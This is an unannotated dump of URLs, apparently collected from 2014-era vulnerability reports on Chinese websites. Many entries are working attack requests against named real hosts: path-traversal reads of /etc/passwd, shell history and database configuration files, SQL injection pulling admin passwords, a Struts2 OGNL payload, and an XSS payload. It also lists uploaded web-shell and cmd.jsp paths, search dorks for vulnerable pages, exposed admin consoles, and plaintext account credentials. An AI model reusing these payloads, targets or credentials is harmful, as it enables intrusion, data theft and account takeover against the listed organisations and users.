ftp://e0734:e0734@www.e0734.com http://202.98.213.134/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://125.66.128.229/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.rhfcgl.com/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://58.42.144.172/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.ybxfgj.cn/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.zylzfc.cn/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.dyfgs.com/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.ysfgj.com.cn/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://222.86.207.241/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.gdfgs.net/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://game.cnhan.com/ http://wooyun.org/bugs/wooyun-2014-076556"得到后台 http://tiyu.nchu.edu.cn/ http://tiyu.nchu.edu.cn/download_ok.asp?id=12 http://www.chem.com.cn/BuyUser_show.aspx?id=848991 http://www.ggjgnh.cn/loginAction.action http://222.73.24.168:8080/s03/loginAction.action http://oa.derlook.com/loginAction!loginOut.do http://www.5u5u5u5u.com/home.action http://www.gdht.net.cn:8866/zy/ws/news_enter.action http://**.**.**/lms/portal/sp/login.php http://210.27.80.82/reader/redr_mail.php http://opac.lib.ustc.edu.cn/reader/get_pwd.php http://www.1000new.com http://183.136.221.199:28017 http://te.tuan.360.cn/checkapi_ajax.html?apiurl=http://soft.corp.qihoo.net http://218.80.212.210/index.asp https://passport.vip.com/login?src=http%3A%2F%2Fday.vip.com%2F26%2F%3Fpage%3D1 http://www.caep.org.cn/ReadNews.asp?NewsID=1183 http://www.cycb.com/conscribe.do?method=index&id=27 http://www.cycb.com/conscribe.do?method=index&id=27 http://lmp.liby.com.cn/lmpum/uuam/login/login.do?method=loginLiby http://tour.nihao8.net http://tour.nihao8.net/LstJobInfo.asp?TT=&SS=&Id=1 http://www.shambhalatrip.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.51yyw.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.jnhts.com/LstJobInfo.asp?TT=&SS=&Id=3 http://xmfits.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.tongyoulm.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.xsbnyou.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.langshanlvyou.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.tanglv.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.0776.cn/help/index.php?zid=8 http://hgsy.yangtzeu.edu.cn/ListArt.aspx?bid=3 inurl:/Docs/Commentlist.aspx?ItemID= http://ndxbskb.imu.edu.cn/docs/Lists.aspx?PinYin=qkdt http://shandixb.paperopen.com/docs/Lists.aspx?PinYin= http://ndxbskb.imu.edu.cn/docs/Lists.aspx?PinYin= http://www.zhsyeklczz.com//docs/Lists.aspx?PinYin= http://www.cqnuj.cn/docs/Lists.aspx?PinYin= http://ndxbskb.imu.edu.cn/docs/Lists.aspx?PinYin=qkdt http://www.sqlmap.org http://91fanhuan.com/www.tar.gz http://91fanhuan.com/pma inurl:ckPlay.aspx?movieID http://tz9158.com/4/ckPlay.aspx?movieID=e72dc544-50e7-4e45-b01c-63ffded http://www.sqlmap.org http://61.130.6.250/jpkc/snfzp-xy/admin/login.asp http://new.trip8080.com:8080/safe/findPwd3ForEmail.htm?emailUrl=vve0c%252FKTGB%252B%252FdYHkoHRwTaf%252FWZxdrHGqW5tODjVDBlpdB4hoQn2R7eB7veqD5KOB http://zatppaimai.com/new_1.asp?id=395 inurl:ckPlay2.aspx?movieID= http://www.tz9158.com/ckPlay2.aspx?movieID=2866b3e6-8460-410a-a526-52f3 http://www.sqlmap.org www.tz9158.com\session wsjws.gzga.gov.cn/leadshow.aspxlid=3061_ http://xzsp.gzjs.gov.cn/PersonApp/print/Structural/EmpNCAppPrint.aspx?fid=499e1008-d2a3- http://yxjs.sntcm.edu.cn/TeacherView.asp?id=16 http://www.hncz.gov.cn:8002/manager/html http://jx.kandian.189.cn/feedback_listThemes.xhtml?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://v.ifeng.com/v/news/zhhzrbzj/index.shtml#012ebafd-8707-47c7-a74c-2f1fa6c643b6 http://101.95.48.76/view.action?page=/layout/browser.free http://spider2.enorth.com.cn:8000/order/admin/main2.jsp www.syyxzz.com http://www.nclggq.com/szwyadmin/login.asp http://www.bjadks.com/index.html http://public.wsbgt.com/ http://public.wsbgt.com/web/KnowledgePoints.aspx?PLTagID=3&ShortName=R http://public.wsbgt.com/Web/History3.aspx?objtype=zgls&dtype=69&type1=0901&type2=2 http://public.wsbgt.com/Web/N_ColorfulThree.aspx?pltid= http://zdcg.517na.com/): http://oa.tmd56.com/ http://www.yzhtxx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yzzqzx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yjqedu.net/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.1s1w.cn/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.51jiemian.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://gxnngy.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.zxsdszx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yzwxzx.net/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yzhtxx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yzzqzx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yjqedu.net/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.1s1w.cn/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.zxsdszx.com/Code/Common/SystemCodeList.aspx?Method=GetCodeTepyBy¶mFileName=1¶mValue=1¶mRturnValue=1 http://www.yygy.net/ws2004/sysManage/Resource/add/editResource.asp?Id=11 http://www.frxinzhong.cn/ws2004/sysManage/Resource/add/editResource.asp?Id=11 http://www.sdwhys.com/ws2004/sysManage/Resource/add/editResource.asp?Id=1 http://www.zjk2z.cn/ws2004/sysManage/Resource/add/editResource.asp?Id=1 http://www.yzsx.net.cn/ws2004/sysManage/Resource/add/editResource.asp?Id=1 http://fn-sso.ceair.com:7010/sso/sso-login.do http://wooyun.org/bugs/wooyun-2010-039293 http://61.55.135.106:8035 http://61.55.135.106:8035/ckfinder/ckfinder.html http://wyx.creditease.cn/manage/index.action http://www.51job.com/shenzhen?passport_loginname=15575376425&passport_password=zhuben456123&submit=%B5%C7%C2%BC http://www.51job.com/changsha?passport_loginname=2925765132@qq.com&passport_password=qweasd&submit= http://223.87.19.5/settings/download.jsp?file=settings/download.jsp&real=1 http://223.87.19.5/settings/download.jsp?file=../../../../../etc/passwd&real=1&real=1 http://223.87.19.5/settings/download.jsp?file=../../../../../root/.bash_history&real=1&real=1 http://223.87.19.5:9999/ http://hvsop.youku.com/list.php?music=1 http://apt.feng.com/index.php?r=album/detail&albumid=546a12ea0e1d15a5128b48c5 http://wapah.189.cn/zt/j/ty/si.jsp?_tid=../../WEB-INF/web.xml%3f http://wapah.189.cn/zt/j/ty/si.jsp?_tid=../../WEB-INF/zt_config.xml%3f http://wapah.189.cn/zt/j/ty/si.jsp?_tid=../../WEB-INF/robotsrc.txt%3f http://www.beij.12306.cn/Dzsw/Shky/hwky.wai/index.action http://log.sslibrary.com/servlet/AddPageRecords?username=ssgpgzsstsg&page=/library.jsp&time=1415194807924 http://game.wo.com.cn/wap_new/game_list.jsp?cla=yx&typesid=5 http://game.wo.com.cn/wap_new/info_list.jsp?cla=zx&typesid=4 http://221.228.204.53:8080/(别问我为什么这个是金山的,看看54和46) http://221.228.204.53:8080/N-grammar/web/ui/ http://k.pcauto.com.cn/questionadd.html http://gys.zs-hospital.sh.cn:8002/ http://www.ahjp.com.cn/Freight.asp?SName=%E8%B4%A7%E8%BF%90%E5%85%AC%E5%91%8A www.sg.bnu.edu.cn www.jiemian.com http://game.wo.com.cn/getgamejy?pageNo=2&pageSize=10&type=gameList&typesid=1%20AND%203*2*1%3d6%20AND%20183%3d183&userSystem=Java http://game.wo.com.cn/delete.jsp http://211.90.75.34 http://211.90.75.35 http://211.90.75.35/upload/files/20141118130949furZ2e3M.jsp http://www.phoenixcne.de/video_window.php?news_id=135536 http://www.phoenixcne.de//video_window.php?news_id=135536+and+1=1 http://www.phoenixcne.de//video_window.php?news_id=135536+and+1=2 http://www.phoenixcne.de//video_window.php?news_id=135536+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- http://www.phoenixcne.de/robots.txt http://www.phoenixcne.de//myadmin/login.php http://www.phoenixcne.de//myadmin/login.php http://mail.gjxfj.gov.cn http://mail.gjxfj.gov.cn/php/bill/print_addfeelog.php http://mail.gjxfj.gov.cn/php/bill/script/index1.php http://www.phoenixcne.de/caiji_news_content.php?news_id=136033 http://www.phoenixcne.de/caiji_news_content.php?news_id=136033 http://mail.hoolai.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://www.wandafilm.com/ http://www.wandafilm.com/user/order_mgr.do?m=orderCancel&orderId=20141118164112671006×tamp=Tue%20Nov%2018%202014%2016:48:48%20GMT+0800&_=1416300528027 http://www.wandafilm.com/user/order_mgr.do?m=orderCancel&orderId=20141118164112671006×tamp=Tue%20Nov%2018%202014%2016:48:48%20GMT+0800&_=1416300528027 http://www.samsoncn.com/product/Customers.aspx Google:https://wen.lu/#q=inurl:%2Foa%2Fdarticle.aspx&btnK=Google+%E6%90%9C%E7%B4%A2 http://tis.hrbeu.edu.cn http://www.cjebm.org.cn http://xbskb.ysu.edu.cn http://www.j-smu.com http://www.hxyxqk.com.cn http://heuxb.hrbeu.edu.cn http://lkkf.njfu.edu.cn http://www.psytxjx.com http://www.xfcjwkzazhi.cn http://www.zgpwzz.com http://jee.ieecas.cn http://xxzz.cintcm.com http://www.ydsjjs.com http://yxxb.xjtu.edu.cn http://jxyj.ysu.edu.cn http://xb.hznu.edu.cn http://emc.hrbust.edu.cn http://www.zgxxwkzz.com http://www.syfsxzz.com.cn http://gjzy.cintcm.com http://www.cjam.net.cn http://www.qbzz.org http://www.cibj.com http://www.zgmnwk.com http://xbskb.jssvc.edu.cn http://www.jwit.org.cn http://xbskb.jssvc.edu.cn http://xbzrb.tjujournals.com http://www.cjcep.com http://www.fmmuxb.cn http://dlxb.nefu.edu.cn http://qhxb.lib.tsinghua.edu.cn http://slgc.nefu.edu.cn http://jjlyj.csuft.edu.cn http://hlgxb.hrbust.edu.cn http://www.cjrccm.com http://xbzkb.jssvc.edu.cn http://xuebao.ysu.edu.cn http://www.ddgzyckx.com http://www.lsjg.cn http://jhau.paperopen.com http://skxb.csuft.edu.cn http://zgwstj.paperonce.org http://nldxb.njfu.edu.cn http://xuebao.zjc.edu.cn http://journal.lut.cn http://youth.nenu.edu.cn/erji.php?id=5073 https://wordpress.org/news/2014/08/wordpress-3-9-2/ https://github.com/chenlian2015/elexchrome/blob/efe440aa96368fe03dac9419b7ec6d1de84aab8c/studydoc/%E5%B8%90%E5%8F%B7.txt https://my.hoolai.com/ http://222.38.2.232:8080/ http://ueditor.baidu.com/website/umeditor.html inurl:newsDetail.do?newsId http://www.xmfls.net/foreign!more.do?mark=1 http://www.xmblxx.com/foreign!more.do?mark=1 http://www.datong.xmedu.cn/foreign!more.do?mark=1 http://61.178.20.150/more.asp?typeid=0002&borderid=0019 http://218.199.176.2 http://rjxy.hrbu.edu.cn/article/list_search.jsp http://jpkc.hrbu.edu.cn:8080/jpkcjs/sm/index2.asp http://sjxy.hrbu.edu.cn/article/list_tzgg.jsp http://jwcdata.hrbu.edu.cn:8080/wjxz2.jsp http://rjxy.hrbu.edu.cn/admin http://sjxy.hrbu.edu.cn/admin http://www.leshan-hospital.com.cn/viewgov.asp?id=2 http://diantai.ifeng.com http://platform.netfield.cn/login http://platform.netfield.cn/cmd.jsp http://www.jdzzyw.com/login http://www.jdzzyw.com/cmd.jsp http://www.bjtjzx.com/bgcx/ http://www.bjtjw.net/bjtjw/index.html,和北京市体检中心不是一个网站,找到这个洞很久了,一直没提交,还是赶快提交了,省的重复了) www.bjtjzx.com http://www.bjtjzx.com www.cnpcscc.com.cn http://www.cnpcscc.com.cn/csccpmp/Handler/GetCommon.ashx http://www.cnpcscc.com.cn/csccpmp/TTUploadPictureDialog.aspx http://www.cnpcscc.com.cn/csccpmp/Doc/XML/help2014111820111349.aspx http://www.cnpcscc.com.cn/csccpmp/TTUploadFileWithDialog.aspx http://www.cnpcscc.com.cn/csccpmp/Doc/XML/help2014111820110669.aspx http://www.kdnet.net/ http://upfile1.kdnet.net/upload_chen_rong.php http://upfile1.kdnet.net/Upload/2014/11/18/14163112658570364.html http://oa.gwbnsh.net.cn/help.aspx http://xpshop.cn http://hzp.xpshop.cn http://etp.xpshop.cn/admin http://www.yzhtxx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzzqzx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yjqedu.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.1s1w.cn/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://gxnngy.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.zxsdszx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzwxzx.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://******.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzhtxx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.1s1w.cn/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.zxsdszx.com/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yzwxzx.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://www.yjqedu.net/Code/Common/SysCommonAttach.aspx?Method=UpdateFile http://v2014.rccms.com/上注册一个企业账户,企业类型选择“我是院校”。 https://www.99bill.com/fiquery/customorder/managecustomorder.htm?payto=admin@sumly.cn http://www.99bill.com/fiquery/customorder/managecustomorder.htm?email=shdongfanghong@126.com https://www.99bill.com/mbrentry/signup/signupresendemail.htm?signupId=16267255 https://www.99bill.com/mbrentry/signup/signupresendemail.htm?signupId=16267255 http://www.99bill.com/forgetpwd/findpassword/validateMobileVerifyCode.htm?idContent=185*********** index.php/article-guanyuwomen-lists-1*.html http://www.laiyifen.com:80/ www.laiyifen.com http://ciid.com.cn/hr/designer.php?uid=90 site:www.233.com/NewsFiles/ http://www.025journal.com/ http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcmzxzz.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://j.chinatransducers.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://gaojian.xhnj.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://xb.cuit.edu.cn/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.jsnyxb.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcsjwk.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.linpi.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.mfskin.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://wooyun.org/bugs/wooyun-2010-040647 https://forum.90sec.org/forum.php?mod=viewthread&tid=2974 http://mail.chinacomm.com.cn/webmail/getPass1.php?email=wcm@chinacomm.com.cn&update=s http://wooyun.org/bugs/wooyun-2010-061894 http://mail.chinacomm.com.cn/webmail/client/cache/649/14163606016.jpg/.php http://auth.coolyun.com http://www.xitic.cn/front/download.do?path=/uploads/2013/04/24/../../../../WEB-INF/web.xml&id= http://www.xitic.cn/front/download.do?path=/uploads/2013/04/24/../../../../WEB-INF/classes/conf/jdbc.properties&id= http://www.xitic.cn/front/download.do?path=/uploads/2013/04/24/../../../../../../../etc/passwd&id= https://smile.wanda.cn/mobile http://smile.wanda.cn/mobile/praise/index http://www.zbzx.edu.cn/shengwuchanpin_shop/vpro.asp?id=738 http://www.zhuhai.gd.cn/ http://www.025journal.com/ http://www.gjmzyfs.com/web/ViewAbstract.aspx?GaoHao=IJ20130428 http://www.cjge-manuscriptcentral.com/Web/ViewAbstract.aspx?GaoHao=wcbx12000102 http://www.lcmzxzz.com/Web/ViewAbstract.aspx?GaoHao=mz11001028 http://gaojian.xhnj.com/Web/ViewAbstract.aspx?GaoHao=NJ11000389 http://xb.cuit.edu.cn/Web/ViewAbstract.aspx?GaoHao=xx12000105 http://j.chinatransducers.com/Web/ViewAbstract.aspx?GaoHao=cg12000968 http://ctc.hlglzz.com/web/ViewAbstract.aspx?GaoHao=hl14001736 http://www.jsnyxb.com/Web/ViewAbstract.aspx?GaoHao=nky12000647 http://smile.wanda.cn/mobile/praise/details/img_id/46194 http://smile.wanda.cn/mobile/review/getdel/imgid/512 http://diantai.ifeng.com/ http://diantai.ifeng.com/index.php/user/myaudio http://admin.diantai.ifeng.com/ http://bbs.meizu.cn/live.html http://223.100.112.36/userLoginAction.action http://223.100.112.50/userLoginAction.action http://110.212.70.77 http://110.228.199.65 http://110.244.147.176 http://111.1.182.202 http://111.2.94.222 http://111.3.152.115 http://112.11.36.127 http://112.65.143.74 http://113.2.99.4 http://113.204.99.154 http://117.147.8.125 http://119.112.134.73 http://119.251.140.147 http://120.198.135.83 http://120.199.209.168 http://120.203.12.91 http://120.236.136.212 http://121.16.249.176 http://121.22.107.251 http://122.138.32.126 http://122.193.249.54 http://122.91.210.111 http://123.134.167.90 http://123.65.242.151 http://123.65.59.35 http://123.66.208.198 http://123.79.217.178 http://123.92.91.145 http://124.67.253.200 http://183.234.16.194 http://183.238.196.199 http://183.246.137.180 http://183.246.167.54 http://183.246.78.84 http://183.247.158.148 http://202.107.2.50 http://219.233.23.122 http://221.123.145.22:80 http://221.123.191.58:80 http://221.200.122.224 http://221.210.224.229 http://222.179.18.14 http://222.179.18.31 http://222.179.18.36 http://222.179.18.43:80 http://222.179.18.52:80 http://222.179.18.53:80 http://222.179.18.58:80 http://222.179.18.67:80 http://222.179.23.130 http://222.41.148.110 http://222.49.203.160 http://223.92.122.207 http://223.94.1.253 http://223.95.174.120 http://223.95.180.62 http://27.204.10.192 http://39.182.69.222 http://39.186.56.134 http://58.18.185.188 http://58.18.250.254 http://58.241.183.204 http://58.244.181.178 http://60.11.233.42 http://60.12.44.238 http://60.18.97.148 http://60.212.255.55 http://60.6.12.213 http://60.8.213.170 http://61.148.123.10 http://61.176.96.218 http://61.176.96.218 http://110.252.177.251 http://110.252.254.132 http://110.252.254.176/ http://112.10.242.196 http://112.14.155.139 http://112.195.121.161 http://115.85.227.193 http://117.184.7.58 http://119.251.197.242 http://120.10.254.185/ http://120.11.249.166 http://120.11.249.228 http://120.11.252.247 http://120.11.252.83 http://120.11.85.245/ http://121.16.213.171 http://121.16.213.66 http://121.23.84.8 http://123.65.200.240 http://123.65.61.86 http://183.247.212.118 http://211.140.158.46 http://218.25.150.70 http://218.26.187.222/ http://220.249.152.136 http://220.249.152.50 http://221.204.225.158 http://222.179.18.10/ http://222.179.18.13/ http://222.179.18.16:80 http://222.179.18.17/ http://222.179.18.18/ http://222.179.18.19/ http://222.179.18.20/ http://222.179.18.21/ http://222.179.18.25/ http://222.179.18.34/ http://222.179.18.51:80 http://223.86.79.176 http://39.183.203.158 http://58.244.227.70/ http://202.102.40.43/admin_login.htm http://phs.js.vnet.cn/CK?act=0&intro=http://www.wooyun.org&u=http://218.94.86.51/servlet/LoginServlet@2 http://www.wahaha.com.cn/FSDownloadServlet?file_key=20131119175139016379.jpg&file_name=erwei.jpg http://en.wahaha.com.cn/news/newsdetail.jsp?content_id=14 http://youth.sicnu.edu.cn:2525/admin/login.asp http://bbs.mgame.baidu.com/config/config_ucenter.php http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://112.65.254.133:8080 http://112.65.254.133:8080/web-console/ http://112.65.254.133:8080/jmx-console/ http://help.mail.163.com/ http://help.mail.163.com/user/reply.do?m=view&feedbackID=279614 http://175kh.com/www.zip http://175kh.com/admin2014/ http://175kh.com/admin2014/ebak/admin.php http://www.zyaic.gov.cn/ http://www.zyaic.gov.cn/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://www.025journal.com/ http://www.cjge-manuscriptcentral.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.lcmzxzz.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://gaojian.xhnj.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://xb.cuit.edu.cn/tougao/GetInfo.aspx?type=getwkqi&value=1 http://j.chinatransducers.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.chinaelectrondevices.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.linpi.net/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.jsnyxb.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.lcsjwk.com/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.mfskin.net/tougao/GetInfo.aspx?type=getwkqi&value=1 http://www.gjmzyfs.com/tougao/GetInfo.aspx?type=getwkqi&value=1 index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLUwybHVaR1Y0TG5Cb2NDOXRaVzFpWlhJdWFIUnRiQT09Lmh0bWw%3D http://www.laiyifen.com:80/ www.laiyifen.com http://www.firstjob.com.cn/eduEnt/private/searchInfo/dacx.action?enterpriseCode=132206043&queryEnterpriseCode=132206043&dw_status=0 www.jnbjrc.gov.cn https://github.com/mn-works/miit/blob/d3534db612173f8e51f6671490d33b0f824219b4/registration-test.php http://stu99.nknu.edu.tw/cgi-bin/openwebmail/openwebmail.pl http://stu99.nknu.edu.tw/ http://www.jl-n-tax.gov.cn/bc/list.jsp?sort_id=2080 http://www.wooyun.org/bugs/wooyun-2010-083808/trace/90b043d5ef1c8dc4e99d9caa0352adc5 http://gs.tmu.cn/new-2012/news/2014/141114.htm http://tjykdx.pcwlkj.cn/ http://203.195.196.198:86/ http://203.195.196.198:86/admin/syslogin.aspx?result=4 http://203.195.196.198:86/admin/global/global_templatesedit.aspx?path=../editor/&filename=222.aspx http://203.195.196.198:86/editor/222.aspx http://cosmetics.ifeng.com/shuangmei/p_37963_698.html http://service.caijing.com.cn/.svn/entries http://蛋疼.com http://www.brtpawn.com/ http://www.brtpawn.com/index.php/Index/newscon/id/3340.html http://www.brtpawn.com/admin.php http://www.haodai.com/account/resetpw/ http://m.rccms.com。 http://m.rccms.com/co/company.php?id=1065 http://m.rccms.com/co/company.php?id=1065%20and http://www.hnbjds.gov.cn:8080/fckeditor//editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp www.hnbjds.gov.cn:8080/one8.jsp?f=文件名&t=内容 http://m.rccms.com/person/resume.php?id=696 http://m.rccms.com/person/resume.php?id=696%20and http://m.rccms.com/person/resume.php?id=696%20and%201=1 http://m.rccms.com/person/resume.php?id=696%20and%201=0 http://www.dlcxdrc.com/company.asp?uid=1556 http://www.cxdrc.com/company.asp?uid=1556 http://www.lnbprsrc.com/company.asp?uid=2672 http://job0514.com/company.asp?uid=462 http://www.0857zp.com/company.asp?uid=5 http://www.yczjw.cn/company.asp?uid=80 http://www.fxrsw.cn/rencai/company.asp?uid=973 http://www.qzjyrczx.com/company.asp?uid=89 http://ysjyj.zgys.gov.cn/company.asp?uid=766 http://www.dlcxdrc.com/persond.asp?uid=3216 http://www.cxdrc.com/persond.asp?uid=3216 http://www.lnbprsrc.com/person.asp?uid=3240 http://job0514.com/person.asp?uid=2192 http://www.0857zp.com/person.asp?uid=97 http://www.yczjw.cn/person.asp?uid=278 http://www.fxrsw.cn/rencai/person.asp?uid=18720 http://www.jobch263.com/person.asp?uid=55834 http://www.qzjyrczx.com/person.asp?uid=378 http://ysjyj.zgys.gov.cn/person.asp?uid=1034 http://vliveachy.tc.qq.com/vwecam.tc.qq.com/1006_4273126e0e36451aab85dd3ad259b1f4.f20.mp4?ptype=http&ocid=1411588012&ocid=227024812 http://bugreport.yulong.com/ http://club.jd.com/Static/js/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://g.yesky.com/hall/server_info?gid=-9169%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x5e5e5e%2CIFNULL%28CAST%28user%28%29%20AS%20CHAR%29%2C0x20%29%2C0x5e5e5e%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&_=1416385564486 http://www.ybc.org.cn/story/youthstorydetail.jsp?positions=15&storypid=408 http://mswkt.xxtyd.fj.cn/data/index?t=1&cat=4 http://hbm.xxtyd.fj.cn/index.php/ajax/getsmsbygrade1.html http://mswkt.xxtyd.fj.cn/data/index?t=1&cat=4 http://hbm.xxtyd.fj.cn/index.php/ajax/getsmsbygrade1.html http://jwc.xju.edu.cn/ZNPK/RoomSel_rpt.aspx?Sel_XQ=1&Sel_JXL=101&Sel_ROOM=1010303&Submit01=%BC%EC%CB%F7&Sel_XNXQ=20140 http://www.strongsoft.net/ http://www.strongsoft.net/ http://work.alibaba-inc.com http://work.alibaba-inc.com/photo/*.jpg(*为工号)就可以看到照片 https://www.supdatasys.cn:6226/order/ http://222.143.253.22:8099/ycb/main.htm user:admin pass:admin http://218.56.39.36 http://203.195.196.198:81/kindeditor/asp/demo.asp http://203.195.196.198:81/kindeditor/asp.net/demo.aspx http://203.195.196.198:81/kindeditor/examples/custom-plugin.html http://203.195.196.198:81/kindeditor/examples/custom-theme.html http://203.195.196.198:81/kindeditor/examples/default.html http://203.195.196.198:81/kindeditor/examples/dynamic-load.html http://203.195.196.198:81/kindeditor/examples/file-dialog.html http://203.195.196.198:81/kindeditor/examples/file-manager.html http://203.195.196.198:81/kindeditor/examples/filter-mode.html http://203.195.196.198:81/kindeditor/examples/image-dialog.html http://203.195.196.198:81/kindeditor/examples/index.html http://203.195.196.198:81/kindeditor/examples/multi-language.html http://203.195.196.198:81/kindeditor/examples/newline.html http://203.195.196.198:81/kindeditor/examples/paste-type.html http://203.195.196.198:81/kindeditor/examples/readonly.html http://203.195.196.198:81/kindeditor/examples/simple.html http://203.195.196.198:81/kindeditor/examples/total.html http://203.195.196.198:81/kindeditor/examples/word-count.html http://203.195.196.198:81/kindeditor/examples/url-type.html http://203.195.196.198:81/kindeditor/examples/uploadbutton.html http://203.195.196.198:81/XTGL/Tree.aspx http://203.195.196.198:81/XTGL/Main.aspx http://203.195.196.198:81/XTGL/syssql/sql_execute.aspx http://203.195.196.198:81/XTGL/SysSp/SysSp_Edit.aspx http://203.195.196.198:81/XTGL/SysSp/SysSp_View.aspx http://203.195.196.198:81/XTGL/Searche/Searche_Edit.aspx http://203.195.196.198:81/XTGL/Searche/Searche_List.aspx http://203.195.196.198:81/XTGL/grid_config/grid_config_edit.aspx http://203.195.196.198:81/XTGL/Edit/Edit.aspx http://203.195.196.198:81/XTGL/DataBackup/backup.aspx http://203.195.196.198:81/Two_Dimension_Code/YG_QR_Code.aspx http://203.195.196.198:81/PMT/PMT_main34.aspx 